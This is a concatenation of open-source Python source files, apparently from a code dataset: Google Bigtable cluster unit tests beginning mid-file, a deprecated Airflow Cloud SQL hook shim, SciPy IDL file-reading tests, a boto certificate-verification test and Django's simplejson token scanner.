instance_api = mock.create_autospec(BigtableInstanceAdminClient)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
instance = Instance(self.INSTANCE_ID, client)
# Create response_pb
cluster_name = client.instance_admin_client.cluster_path(
self.PROJECT, self.INSTANCE_ID, self.CLUSTER_ID
)
response_pb = data_v2_pb2.Cluster(name=cluster_name)
# Patch the stub used by the API method.
client._instance_admin_client = instance_api
bigtable_instance_stub = client._instance_admin_client
bigtable_instance_stub.get_cluster.side_effect = [
response_pb,
exceptions.NotFound("testing"),
exceptions.BadRequest("testing"),
]
# Perform the method and check the result.
non_existing_cluster_id = "cluster-id-2"
alt_cluster_1 = self._make_one(self.CLUSTER_ID, instance)
alt_cluster_2 = self._make_one(non_existing_cluster_id, instance)
self.assertTrue(alt_cluster_1.exists())
self.assertFalse(alt_cluster_2.exists())
with self.assertRaises(exceptions.BadRequest):
alt_cluster_1.exists()
def test_create(self):
import datetime
from google.longrunning import operations_pb2
from google.protobuf.any_pb2 import Any
from google.cloud.bigtable_admin_v2.types import (
bigtable_instance_admin as messages_v2_pb2,
)
from google.cloud._helpers import _datetime_to_pb_timestamp
from google.cloud.bigtable.instance import Instance
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
from google.cloud.bigtable_admin_v2.types import instance as instance_v2_pb2
from google.cloud.bigtable.enums import StorageType
NOW = datetime.datetime.utcnow()
NOW_PB = _datetime_to_pb_timestamp(NOW)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
STORAGE_TYPE_SSD = StorageType.SSD
LOCATION = self.LOCATION_PATH + self.LOCATION_ID
instance = Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID,
instance,
location_id=self.LOCATION_ID,
serve_nodes=self.SERVE_NODES,
default_storage_type=STORAGE_TYPE_SSD,
)
expected_request_cluster = instance_v2_pb2.Cluster(
location=LOCATION,
serve_nodes=cluster.serve_nodes,
default_storage_type=cluster.default_storage_type,
)
expected_request = {
"request": {
"parent": instance.name,
"cluster_id": self.CLUSTER_ID,
"cluster": expected_request_cluster,
}
}
name = instance.name
metadata = messages_v2_pb2.CreateClusterMetadata(request_time=NOW_PB)
type_url = "type.googleapis.com/{}".format(
messages_v2_pb2.CreateClusterMetadata._meta._pb.DESCRIPTOR.full_name
)
response_pb = operations_pb2.Operation(
name=self.OP_NAME,
metadata=Any(type_url=type_url, value=metadata._pb.SerializeToString()),
)
# Patch the stub used by the API method.
api = mock.create_autospec(BigtableInstanceAdminClient)
api.common_location_path.return_value = LOCATION
client._instance_admin_client = api
cluster._instance._client = client
cluster._instance._client.instance_admin_client.instance_path.return_value = (
name
)
client._instance_admin_client.create_cluster.return_value = response_pb
# Perform the method and check the result.
cluster.create()
actual_request = client._instance_admin_client.create_cluster.call_args_list[
0
].kwargs
self.assertEqual(actual_request, expected_request)
def test_create_w_cmek(self):
import datetime
from google.longrunning import operations_pb2
from google.protobuf.any_pb2 import Any
from google.cloud.bigtable_admin_v2.types import (
bigtable_instance_admin as messages_v2_pb2,
)
from google.cloud._helpers import _datetime_to_pb_timestamp
from google.cloud.bigtable.instance import Instance
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
from google.cloud.bigtable_admin_v2.types import instance as instance_v2_pb2
from google.cloud.bigtable.enums import StorageType
NOW = datetime.datetime.utcnow()
NOW_PB = _datetime_to_pb_timestamp(NOW)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
STORAGE_TYPE_SSD = StorageType.SSD
LOCATION = self.LOCATION_PATH + self.LOCATION_ID
instance = Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID,
instance,
location_id=self.LOCATION_ID,
serve_nodes=self.SERVE_NODES,
default_storage_type=STORAGE_TYPE_SSD,
kms_key_name=self.KMS_KEY_NAME,
)
expected_request_cluster = instance_v2_pb2.Cluster(
location=LOCATION,
serve_nodes=cluster.serve_nodes,
default_storage_type=cluster.default_storage_type,
encryption_config=instance_v2_pb2.Cluster.EncryptionConfig(
kms_key_name=self.KMS_KEY_NAME,
),
)
expected_request = {
"request": {
"parent": instance.name,
"cluster_id": self.CLUSTER_ID,
"cluster": expected_request_cluster,
}
}
name = instance.name
metadata = messages_v2_pb2.CreateClusterMetadata(request_time=NOW_PB)
type_url = "type.googleapis.com/{}".format(
messages_v2_pb2.CreateClusterMetadata._meta._pb.DESCRIPTOR.full_name
)
response_pb = operations_pb2.Operation(
name=self.OP_NAME,
metadata=Any(type_url=type_url, value=metadata._pb.SerializeToString()),
)
# Patch the stub used by the API method.
api = mock.create_autospec(BigtableInstanceAdminClient)
api.common_location_path.return_value = LOCATION
client._instance_admin_client = api
cluster._instance._client = client
cluster._instance._client.instance_admin_client.instance_path.return_value = (
name
)
client._instance_admin_client.create_cluster.return_value = response_pb
# Perform the method and check the result.
cluster.create()
actual_request = client._instance_admin_client.create_cluster.call_args_list[
0
].kwargs
self.assertEqual(actual_request, expected_request)
def test_update(self):
import datetime
from google.longrunning import operations_pb2
from google.protobuf.any_pb2 import Any
from google.cloud._helpers import _datetime_to_pb_timestamp
from google.cloud.bigtable_admin_v2.types import (
bigtable_instance_admin as messages_v2_pb2,
)
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
from google.cloud.bigtable.enums import StorageType
NOW = datetime.datetime.utcnow()
NOW_PB = _datetime_to_pb_timestamp(NOW)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
STORAGE_TYPE_SSD = StorageType.SSD
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(
self.CLUSTER_ID,
instance,
location_id=self.LOCATION_ID,
serve_nodes=self.SERVE_NODES,
default_storage_type=STORAGE_TYPE_SSD,
)
# Create expected_request
expected_request = {
"request": {
"name": "projects/project/instances/instance-id/clusters/cluster-id",
"serve_nodes": 5,
"location": None,
}
}
metadata = messages_v2_pb2.UpdateClusterMetadata(request_time=NOW_PB)
type_url = "type.googleapis.com/{}".format(
messages_v2_pb2.UpdateClusterMetadata._meta._pb.DESCRIPTOR.full_name
)
response_pb = operations_pb2.Operation(
name=self.OP_NAME,
metadata=Any(type_url=type_url, value=metadata._pb.SerializeToString()),
)
# Patch the stub used by the API method.
api = mock.create_autospec(BigtableInstanceAdminClient)
client._instance_admin_client = api
cluster._instance._client.instance_admin_client.cluster_path.return_value = (
"projects/project/instances/instance-id/clusters/cluster-id"
)
# Perform the method and check the result.
client._instance_admin_client.update_cluster.return_value = response_pb
cluster.update()
actual_request = client._instance_admin_client.update_cluster.call_args_list[
0
].kwargs
self.assertEqual(actual_request, expected_request)
def test_delete(self):
from google.protobuf import empty_pb2
from google.cloud.bigtable_admin_v2.services.bigtable_instance_admin import (
BigtableInstanceAdminClient,
)
api = mock.create_autospec(BigtableInstanceAdminClient)
credentials = _make_credentials()
client = self._make_client(
project=self.PROJECT, credentials=credentials, admin=True
)
instance = _Instance(self.INSTANCE_ID, client)
cluster = self._make_one(self.CLUSTER_ID, instance, self.LOCATION_ID)
# Create response_pb
response_pb = empty_pb2.Empty()
# Patch the stub used by the API method.
client._instance_admin_client = api
instance_admin_client = client._instance_admin_client
instance_stub = instance_admin_client
instance_stub.delete_cluster.side_effect = [response_pb]
# Create expected_result.
expected_result = None # delete() has no return value.
# Perform the method and check the result.
result = cluster.delete()
self.assertEqual(result, expected_result)
class _Instance(object):
def __init__(self, instance_id, client):
self.instance_id = instance_id
self._client = client
def __eq__(self, other):
return other.instance_id == self.instance_id and other._client == self._client
class _Client(object):
def __init__(self, project):
self.project = project
self.project_name = "projects/" + self.project
self._operations_stub = mock.sentinel.operations_stub
def __eq__(self, other):
return other.project == self.project and other.project_name == self.project_name
|
apache-2.0
|
airbnb/airflow
|
airflow/contrib/hooks/gcp_sql_hook.py
|
7
|
1779
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module is deprecated. Please use `airflow.providers.google.cloud.hooks.cloud_sql`."""
import warnings
from airflow.providers.google.cloud.hooks.cloud_sql import CloudSQLDatabaseHook, CloudSQLHook
warnings.warn(
"This module is deprecated. Please use `airflow.providers.google.cloud.hooks.cloud_sql`",
DeprecationWarning,
stacklevel=2,
)
class CloudSqlDatabaseHook(CloudSQLDatabaseHook):
"""
This class is deprecated.
Please use `airflow.providers.google.cloud.hooks.cloud_sql.CloudSQLDatabaseHook`.
"""
def __init__(self, *args, **kwargs):
warnings.warn(self.__doc__, DeprecationWarning, stacklevel=2)
super().__init__(*args, **kwargs)
class CloudSqlHook(CloudSQLHook):
"""This class is deprecated. Please use `airflow.providers.google.cloud.hooks.sql.CloudSQLHook`."""
def __init__(self, *args, **kwargs):
warnings.warn(self.__doc__, DeprecationWarning, stacklevel=2)
super().__init__(*args, **kwargs)
|
apache-2.0
|
jor-/scipy
|
scipy/io/tests/test_idl.py
|
26
|
19683
|
from __future__ import division, print_function, absolute_import
from os import path
import warnings
DATA_PATH = path.join(path.dirname(__file__), 'data')
import numpy as np
from numpy.testing import (assert_equal, assert_array_equal,
assert_)
from scipy._lib._numpy_compat import suppress_warnings
from scipy.io.idl import readsav
def object_array(*args):
"""Constructs a numpy array of objects"""
array = np.empty(len(args), dtype=object)
for i in range(len(args)):
array[i] = args[i]
return array
def assert_identical(a, b):
"""Assert whether value AND type are the same"""
assert_equal(a, b)
if type(b) is str:
assert_equal(type(a), type(b))
else:
assert_equal(np.asarray(a).dtype.type, np.asarray(b).dtype.type)
def assert_array_identical(a, b):
"""Assert whether values AND type are the same"""
assert_array_equal(a, b)
assert_equal(a.dtype.type, b.dtype.type)
# Define vectorized ID function for pointer arrays
vect_id = np.vectorize(id)
class TestIdict:
def test_idict(self):
custom_dict = {'a': np.int16(999)}
original_id = id(custom_dict)
s = readsav(path.join(DATA_PATH, 'scalar_byte.sav'), idict=custom_dict, verbose=False)
assert_equal(original_id, id(s))
assert_('a' in s)
assert_identical(s['a'], np.int16(999))
assert_identical(s['i8u'], np.uint8(234))
class TestScalars:
# Test that scalar values are read in with the correct value and type
def test_byte(self):
s = readsav(path.join(DATA_PATH, 'scalar_byte.sav'), verbose=False)
assert_identical(s.i8u, np.uint8(234))
def test_int16(self):
s = readsav(path.join(DATA_PATH, 'scalar_int16.sav'), verbose=False)
assert_identical(s.i16s, np.int16(-23456))
def test_int32(self):
s = readsav(path.join(DATA_PATH, 'scalar_int32.sav'), verbose=False)
assert_identical(s.i32s, np.int32(-1234567890))
def test_float32(self):
s = readsav(path.join(DATA_PATH, 'scalar_float32.sav'), verbose=False)
assert_identical(s.f32, np.float32(-3.1234567e+37))
def test_float64(self):
s = readsav(path.join(DATA_PATH, 'scalar_float64.sav'), verbose=False)
assert_identical(s.f64, np.float64(-1.1976931348623157e+307))
def test_complex32(self):
s = readsav(path.join(DATA_PATH, 'scalar_complex32.sav'), verbose=False)
assert_identical(s.c32, np.complex64(3.124442e13-2.312442e31j))
def test_bytes(self):
s = readsav(path.join(DATA_PATH, 'scalar_string.sav'), verbose=False)
assert_identical(s.s, np.bytes_("The quick brown fox jumps over the lazy python"))
def test_structure(self):
pass
def test_complex64(self):
s = readsav(path.join(DATA_PATH, 'scalar_complex64.sav'), verbose=False)
assert_identical(s.c64, np.complex128(1.1987253647623157e+112-5.1987258887729157e+307j))
def test_heap_pointer(self):
pass
def test_object_reference(self):
pass
def test_uint16(self):
s = readsav(path.join(DATA_PATH, 'scalar_uint16.sav'), verbose=False)
assert_identical(s.i16u, np.uint16(65511))
def test_uint32(self):
s = readsav(path.join(DATA_PATH, 'scalar_uint32.sav'), verbose=False)
assert_identical(s.i32u, np.uint32(4294967233))
def test_int64(self):
s = readsav(path.join(DATA_PATH, 'scalar_int64.sav'), verbose=False)
assert_identical(s.i64s, np.int64(-9223372036854774567))
def test_uint64(self):
s = readsav(path.join(DATA_PATH, 'scalar_uint64.sav'), verbose=False)
assert_identical(s.i64u, np.uint64(18446744073709529285))
class TestCompressed(TestScalars):
# Test that compressed .sav files can be read in
def test_compressed(self):
s = readsav(path.join(DATA_PATH, 'various_compressed.sav'), verbose=False)
assert_identical(s.i8u, np.uint8(234))
assert_identical(s.f32, np.float32(-3.1234567e+37))
assert_identical(s.c64, np.complex128(1.1987253647623157e+112-5.1987258887729157e+307j))
assert_equal(s.array5d.shape, (4, 3, 4, 6, 5))
assert_identical(s.arrays.a[0], np.array([1, 2, 3], dtype=np.int16))
assert_identical(s.arrays.b[0], np.array([4., 5., 6., 7.], dtype=np.float32))
assert_identical(s.arrays.c[0], np.array([np.complex64(1+2j), np.complex64(7+8j)]))
assert_identical(s.arrays.d[0], np.array([b"cheese", b"bacon", b"spam"], dtype=object))
class TestArrayDimensions:
# Test that multi-dimensional arrays are read in with the correct dimensions
def test_1d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_1d.sav'), verbose=False)
assert_equal(s.array1d.shape, (123, ))
def test_2d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_2d.sav'), verbose=False)
assert_equal(s.array2d.shape, (22, 12))
def test_3d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_3d.sav'), verbose=False)
assert_equal(s.array3d.shape, (11, 22, 12))
def test_4d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_4d.sav'), verbose=False)
assert_equal(s.array4d.shape, (4, 5, 8, 7))
def test_5d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_5d.sav'), verbose=False)
assert_equal(s.array5d.shape, (4, 3, 4, 6, 5))
def test_6d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_6d.sav'), verbose=False)
assert_equal(s.array6d.shape, (3, 6, 4, 5, 3, 4))
def test_7d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_7d.sav'), verbose=False)
assert_equal(s.array7d.shape, (2, 1, 2, 3, 4, 3, 2))
def test_8d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_8d.sav'), verbose=False)
assert_equal(s.array8d.shape, (4, 3, 2, 1, 2, 3, 5, 4))
class TestStructures:
def test_scalars(self):
s = readsav(path.join(DATA_PATH, 'struct_scalars.sav'), verbose=False)
assert_identical(s.scalars.a, np.array(np.int16(1)))
assert_identical(s.scalars.b, np.array(np.int32(2)))
assert_identical(s.scalars.c, np.array(np.float32(3.)))
assert_identical(s.scalars.d, np.array(np.float64(4.)))
assert_identical(s.scalars.e, np.array([b"spam"], dtype=object))
assert_identical(s.scalars.f, np.array(np.complex64(-1.+3j)))
def test_scalars_replicated(self):
s = readsav(path.join(DATA_PATH, 'struct_scalars_replicated.sav'), verbose=False)
assert_identical(s.scalars_rep.a, np.repeat(np.int16(1), 5))
assert_identical(s.scalars_rep.b, np.repeat(np.int32(2), 5))
assert_identical(s.scalars_rep.c, np.repeat(np.float32(3.), 5))
assert_identical(s.scalars_rep.d, np.repeat(np.float64(4.), 5))
assert_identical(s.scalars_rep.e, np.repeat(b"spam", 5).astype(object))
assert_identical(s.scalars_rep.f, np.repeat(np.complex64(-1.+3j), 5))
def test_scalars_replicated_3d(self):
s = readsav(path.join(DATA_PATH, 'struct_scalars_replicated_3d.sav'), verbose=False)
assert_identical(s.scalars_rep.a, np.repeat(np.int16(1), 24).reshape(4, 3, 2))
assert_identical(s.scalars_rep.b, np.repeat(np.int32(2), 24).reshape(4, 3, 2))
assert_identical(s.scalars_rep.c, np.repeat(np.float32(3.), 24).reshape(4, 3, 2))
assert_identical(s.scalars_rep.d, np.repeat(np.float64(4.), 24).reshape(4, 3, 2))
assert_identical(s.scalars_rep.e, np.repeat(b"spam", 24).reshape(4, 3, 2).astype(object))
assert_identical(s.scalars_rep.f, np.repeat(np.complex64(-1.+3j), 24).reshape(4, 3, 2))
def test_arrays(self):
s = readsav(path.join(DATA_PATH, 'struct_arrays.sav'), verbose=False)
assert_array_identical(s.arrays.a[0], np.array([1, 2, 3], dtype=np.int16))
assert_array_identical(s.arrays.b[0], np.array([4., 5., 6., 7.], dtype=np.float32))
assert_array_identical(s.arrays.c[0], np.array([np.complex64(1+2j), np.complex64(7+8j)]))
assert_array_identical(s.arrays.d[0], np.array([b"cheese", b"bacon", b"spam"], dtype=object))
def test_arrays_replicated(self):
s = readsav(path.join(DATA_PATH, 'struct_arrays_replicated.sav'), verbose=False)
# Check column types
assert_(s.arrays_rep.a.dtype.type is np.object_)
assert_(s.arrays_rep.b.dtype.type is np.object_)
assert_(s.arrays_rep.c.dtype.type is np.object_)
assert_(s.arrays_rep.d.dtype.type is np.object_)
# Check column shapes
assert_equal(s.arrays_rep.a.shape, (5, ))
assert_equal(s.arrays_rep.b.shape, (5, ))
assert_equal(s.arrays_rep.c.shape, (5, ))
assert_equal(s.arrays_rep.d.shape, (5, ))
# Check values
for i in range(5):
assert_array_identical(s.arrays_rep.a[i],
np.array([1, 2, 3], dtype=np.int16))
assert_array_identical(s.arrays_rep.b[i],
np.array([4., 5., 6., 7.], dtype=np.float32))
assert_array_identical(s.arrays_rep.c[i],
np.array([np.complex64(1+2j),
np.complex64(7+8j)]))
assert_array_identical(s.arrays_rep.d[i],
np.array([b"cheese", b"bacon", b"spam"],
dtype=object))
def test_arrays_replicated_3d(self):
s = readsav(path.join(DATA_PATH, 'struct_arrays_replicated_3d.sav'), verbose=False)
# Check column types
assert_(s.arrays_rep.a.dtype.type is np.object_)
assert_(s.arrays_rep.b.dtype.type is np.object_)
assert_(s.arrays_rep.c.dtype.type is np.object_)
assert_(s.arrays_rep.d.dtype.type is np.object_)
# Check column shapes
assert_equal(s.arrays_rep.a.shape, (4, 3, 2))
assert_equal(s.arrays_rep.b.shape, (4, 3, 2))
assert_equal(s.arrays_rep.c.shape, (4, 3, 2))
assert_equal(s.arrays_rep.d.shape, (4, 3, 2))
# Check values
for i in range(4):
for j in range(3):
for k in range(2):
assert_array_identical(s.arrays_rep.a[i, j, k],
np.array([1, 2, 3], dtype=np.int16))
assert_array_identical(s.arrays_rep.b[i, j, k],
np.array([4., 5., 6., 7.],
dtype=np.float32))
assert_array_identical(s.arrays_rep.c[i, j, k],
np.array([np.complex64(1+2j),
np.complex64(7+8j)]))
assert_array_identical(s.arrays_rep.d[i, j, k],
np.array([b"cheese", b"bacon", b"spam"],
dtype=object))
def test_inheritance(self):
s = readsav(path.join(DATA_PATH, 'struct_inherit.sav'), verbose=False)
assert_identical(s.fc.x, np.array([0], dtype=np.int16))
assert_identical(s.fc.y, np.array([0], dtype=np.int16))
assert_identical(s.fc.r, np.array([0], dtype=np.int16))
assert_identical(s.fc.c, np.array([4], dtype=np.int16))
def test_arrays_corrupt_idl80(self):
# test byte arrays with missing nbyte information from IDL 8.0 .sav file
with suppress_warnings() as sup:
sup.filter(UserWarning, "Not able to verify number of bytes from header")
s = readsav(path.join(DATA_PATH,'struct_arrays_byte_idl80.sav'),
verbose=False)
assert_identical(s.y.x[0], np.array([55,66], dtype=np.uint8))
class TestPointers:
# Check that pointers in .sav files produce references to the same object in Python
def test_pointers(self):
s = readsav(path.join(DATA_PATH, 'scalar_heap_pointer.sav'), verbose=False)
assert_identical(s.c64_pointer1, np.complex128(1.1987253647623157e+112-5.1987258887729157e+307j))
assert_identical(s.c64_pointer2, np.complex128(1.1987253647623157e+112-5.1987258887729157e+307j))
assert_(s.c64_pointer1 is s.c64_pointer2)
class TestPointerArray:
# Test that pointers in arrays are correctly read in
def test_1d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_1d.sav'), verbose=False)
assert_equal(s.array1d.shape, (123, ))
assert_(np.all(s.array1d == np.float32(4.)))
assert_(np.all(vect_id(s.array1d) == id(s.array1d[0])))
def test_2d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_2d.sav'), verbose=False)
assert_equal(s.array2d.shape, (22, 12))
assert_(np.all(s.array2d == np.float32(4.)))
assert_(np.all(vect_id(s.array2d) == id(s.array2d[0,0])))
def test_3d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_3d.sav'), verbose=False)
assert_equal(s.array3d.shape, (11, 22, 12))
assert_(np.all(s.array3d == np.float32(4.)))
assert_(np.all(vect_id(s.array3d) == id(s.array3d[0,0,0])))
def test_4d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_4d.sav'), verbose=False)
assert_equal(s.array4d.shape, (4, 5, 8, 7))
assert_(np.all(s.array4d == np.float32(4.)))
assert_(np.all(vect_id(s.array4d) == id(s.array4d[0,0,0,0])))
def test_5d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_5d.sav'), verbose=False)
assert_equal(s.array5d.shape, (4, 3, 4, 6, 5))
assert_(np.all(s.array5d == np.float32(4.)))
assert_(np.all(vect_id(s.array5d) == id(s.array5d[0,0,0,0,0])))
def test_6d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_6d.sav'), verbose=False)
assert_equal(s.array6d.shape, (3, 6, 4, 5, 3, 4))
assert_(np.all(s.array6d == np.float32(4.)))
assert_(np.all(vect_id(s.array6d) == id(s.array6d[0,0,0,0,0,0])))
def test_7d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_7d.sav'), verbose=False)
assert_equal(s.array7d.shape, (2, 1, 2, 3, 4, 3, 2))
assert_(np.all(s.array7d == np.float32(4.)))
assert_(np.all(vect_id(s.array7d) == id(s.array7d[0,0,0,0,0,0,0])))
def test_8d(self):
s = readsav(path.join(DATA_PATH, 'array_float32_pointer_8d.sav'), verbose=False)
assert_equal(s.array8d.shape, (4, 3, 2, 1, 2, 3, 5, 4))
assert_(np.all(s.array8d == np.float32(4.)))
assert_(np.all(vect_id(s.array8d) == id(s.array8d[0,0,0,0,0,0,0,0])))
class TestPointerStructures:
# Test that structures are correctly read in
def test_scalars(self):
s = readsav(path.join(DATA_PATH, 'struct_pointers.sav'), verbose=False)
assert_identical(s.pointers.g, np.array(np.float32(4.), dtype=np.object_))
assert_identical(s.pointers.h, np.array(np.float32(4.), dtype=np.object_))
assert_(id(s.pointers.g[0]) == id(s.pointers.h[0]))
def test_pointers_replicated(self):
s = readsav(path.join(DATA_PATH, 'struct_pointers_replicated.sav'), verbose=False)
assert_identical(s.pointers_rep.g, np.repeat(np.float32(4.), 5).astype(np.object_))
assert_identical(s.pointers_rep.h, np.repeat(np.float32(4.), 5).astype(np.object_))
assert_(np.all(vect_id(s.pointers_rep.g) == vect_id(s.pointers_rep.h)))
def test_pointers_replicated_3d(self):
s = readsav(path.join(DATA_PATH, 'struct_pointers_replicated_3d.sav'), verbose=False)
s_expect = np.repeat(np.float32(4.), 24).reshape(4, 3, 2).astype(np.object_)
assert_identical(s.pointers_rep.g, s_expect)
assert_identical(s.pointers_rep.h, s_expect)
assert_(np.all(vect_id(s.pointers_rep.g) == vect_id(s.pointers_rep.h)))
def test_arrays(self):
s = readsav(path.join(DATA_PATH, 'struct_pointer_arrays.sav'), verbose=False)
assert_array_identical(s.arrays.g[0], np.repeat(np.float32(4.), 2).astype(np.object_))
assert_array_identical(s.arrays.h[0], np.repeat(np.float32(4.), 3).astype(np.object_))
assert_(np.all(vect_id(s.arrays.g[0]) == id(s.arrays.g[0][0])))
assert_(np.all(vect_id(s.arrays.h[0]) == id(s.arrays.h[0][0])))
assert_(id(s.arrays.g[0][0]) == id(s.arrays.h[0][0]))
def test_arrays_replicated(self):
s = readsav(path.join(DATA_PATH, 'struct_pointer_arrays_replicated.sav'), verbose=False)
# Check column types
assert_(s.arrays_rep.g.dtype.type is np.object_)
assert_(s.arrays_rep.h.dtype.type is np.object_)
# Check column shapes
assert_equal(s.arrays_rep.g.shape, (5, ))
assert_equal(s.arrays_rep.h.shape, (5, ))
# Check values
for i in range(5):
assert_array_identical(s.arrays_rep.g[i], np.repeat(np.float32(4.), 2).astype(np.object_))
assert_array_identical(s.arrays_rep.h[i], np.repeat(np.float32(4.), 3).astype(np.object_))
assert_(np.all(vect_id(s.arrays_rep.g[i]) == id(s.arrays_rep.g[0][0])))
assert_(np.all(vect_id(s.arrays_rep.h[i]) == id(s.arrays_rep.h[0][0])))
def test_arrays_replicated_3d(self):
pth = path.join(DATA_PATH, 'struct_pointer_arrays_replicated_3d.sav')
s = readsav(pth, verbose=False)
# Check column types
assert_(s.arrays_rep.g.dtype.type is np.object_)
assert_(s.arrays_rep.h.dtype.type is np.object_)
# Check column shapes
assert_equal(s.arrays_rep.g.shape, (4, 3, 2))
assert_equal(s.arrays_rep.h.shape, (4, 3, 2))
# Check values
for i in range(4):
for j in range(3):
for k in range(2):
assert_array_identical(s.arrays_rep.g[i, j, k],
np.repeat(np.float32(4.), 2).astype(np.object_))
assert_array_identical(s.arrays_rep.h[i, j, k],
np.repeat(np.float32(4.), 3).astype(np.object_))
assert_(np.all(vect_id(s.arrays_rep.g[i, j, k]) == id(s.arrays_rep.g[0, 0, 0][0])))
assert_(np.all(vect_id(s.arrays_rep.h[i, j, k]) == id(s.arrays_rep.h[0, 0, 0][0])))
class TestTags:
'''Test that sav files with description tag read at all'''
def test_description(self):
s = readsav(path.join(DATA_PATH, 'scalar_byte_descr.sav'), verbose=False)
assert_identical(s.i8u, np.uint8(234))
def test_null_pointer():
# Regression test for null pointers.
s = readsav(path.join(DATA_PATH, 'null_pointer.sav'), verbose=False)
assert_identical(s.point, None)
assert_identical(s.check, np.int16(5))
def test_invalid_pointer():
# Regression test for invalid pointers (gh-4613).
# In some files in the wild, pointers can sometimes refer to a heap
# variable that does not exist. In that case, we now gracefully fail for
# that variable and replace the variable with None and emit a warning.
# Since it's difficult to artificially produce such files, the file used
# here has been edited to force the pointer reference to be invalid.
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
s = readsav(path.join(DATA_PATH, 'invalid_pointer.sav'), verbose=False)
assert_(len(w) == 1)
assert_(str(w[0].message) == ("Variable referenced by pointer not found in "
"heap: variable will be set to None"))
assert_identical(s['a'], np.array([None, None]))
|
bsd-3-clause
|
varunarya10/boto
|
tests/integration/cloudsearch/test_cert_verification.py
|
126
|
1577
|
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Check that all of the certs on all service endpoints validate.
"""
import unittest
from tests.integration import ServiceCertVerificationTest
import boto.cloudsearch
class CloudSearchCertVerificationTest(unittest.TestCase, ServiceCertVerificationTest):
cloudsearch = True
regions = boto.cloudsearch.regions()
def sample_service_call(self, conn):
conn.describe_domains()
|
mit
|
bratsche/Neutron-Drive
|
google_appengine/lib/django_1_2/django/utils/simplejson/scanner.py
|
928
|
2227
|
"""JSON token scanner
"""
import re
try:
from simplejson._speedups import make_scanner as c_make_scanner
except ImportError:
c_make_scanner = None
__all__ = ['make_scanner']
NUMBER_RE = re.compile(
r'(-?(?:0|[1-9]\d*))(\.\d+)?([eE][-+]?\d+)?',
(re.VERBOSE | re.MULTILINE | re.DOTALL))
def py_make_scanner(context):
parse_object = context.parse_object
parse_array = context.parse_array
parse_string = context.parse_string
match_number = NUMBER_RE.match
encoding = context.encoding
strict = context.strict
parse_float = context.parse_float
parse_int = context.parse_int
parse_constant = context.parse_constant
object_hook = context.object_hook
def _scan_once(string, idx):
try:
nextchar = string[idx]
except IndexError:
raise StopIteration
if nextchar == '"':
return parse_string(string, idx + 1, encoding, strict)
elif nextchar == '{':
return parse_object((string, idx + 1), encoding, strict, _scan_once, object_hook)
elif nextchar == '[':
return parse_array((string, idx + 1), _scan_once)
elif nextchar == 'n' and string[idx:idx + 4] == 'null':
return None, idx + 4
elif nextchar == 't' and string[idx:idx + 4] == 'true':
return True, idx + 4
elif nextchar == 'f' and string[idx:idx + 5] == 'false':
return False, idx + 5
m = match_number(string, idx)
if m is not None:
integer, frac, exp = m.groups()
if frac or exp:
res = parse_float(integer + (frac or '') + (exp or ''))
else:
res = parse_int(integer)
return res, m.end()
elif nextchar == 'N' and string[idx:idx + 3] == 'NaN':
return parse_constant('NaN'), idx + 3
elif nextchar == 'I' and string[idx:idx + 8] == 'Infinity':
return parse_constant('Infinity'), idx + 8
elif nextchar == '-' and string[idx:idx + 9] == '-Infinity':
return parse_constant('-Infinity'), idx + 9
else:
raise StopIteration
return _scan_once
